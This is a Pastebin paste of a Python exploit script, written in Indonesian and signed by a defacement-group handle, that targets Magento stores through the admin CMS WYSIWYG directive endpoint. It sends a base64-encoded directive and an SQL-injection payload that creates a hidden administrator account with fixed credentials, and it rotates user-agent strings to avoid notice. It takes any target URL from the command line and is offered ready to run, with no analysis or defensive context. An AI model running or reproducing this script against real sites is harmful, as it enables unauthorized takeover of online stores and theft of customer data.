Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #Ref : https://www.exploit-db.com/exploits/37977/
- import sys
- try:
- import requests
- except:
- print "Modul requests belum ter-install"
- sys.exit()
- import base64,random,os
- os.system('clear')
- judul ="""
- __ ______ __________ ____________
- / |/ / _ |/ ___/ __/ |/ /_ __/ __ \
- / /|_/ / __ / (_ / _// / / / / /_/ /
- /_/__/_/_/_|_\___/___/_/|_/_/_/ _\____/_____ __
- / _ | / _ \/ _ \ / _ | / _ \/ |/ / _/ |/ /
- / __ |/ // / // / / __ |/ // / /|_/ // // /
- /_/ |_/____/____/ /_/ |_/____/_/ /_/___/_/|_/
- CODED BY : SECURITY007
- EMAIL : defacementsec007@gmail.com
- *Exploit sukses tapi gak bisa login?
- coba ganti username dan password di dalam script ini!!
- """
- print judul
- def exploit(url):
- target = url + "/admin/Cms_Wysiwyg/directive/index/"
- xm = """
- SET @SALT = 'rp';
- SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
- SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
- INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
- INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
- """
- useragent = ['Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3','Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)','Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)','Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)']
- ua = random.choice(useragent)
- print "[+] Menambah username dan password baru"
- ku = xm.replace("\n", "").format(username="security", password="security")#ganti apabila gagal login
- pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(ku)
- try:
- r = requests.post(target,data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ","filter": base64.b64encode(pfilter),"forwarded": 1},headers={'User-Agent':ua})
- except:
- print "[!] tidak bisa konek ke target"
- sys.exit()
- if r.ok:
- print "[+] Exploit sukses"
- print "cek {0}/admin dengan user:password security:security".format(url)#ganti security:security dengan password dan username yang kalian ubah diatas
- else:
- print "[!] Exploit gagal"
- def main():
- if len(sys.argv)!=2:
- print "Usage python "+sys.argv[0]+" <target>"
- else:
- print "[+] Sedang meng-exploit target"
- exploit(sys.argv[1])
- if __name__=="__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement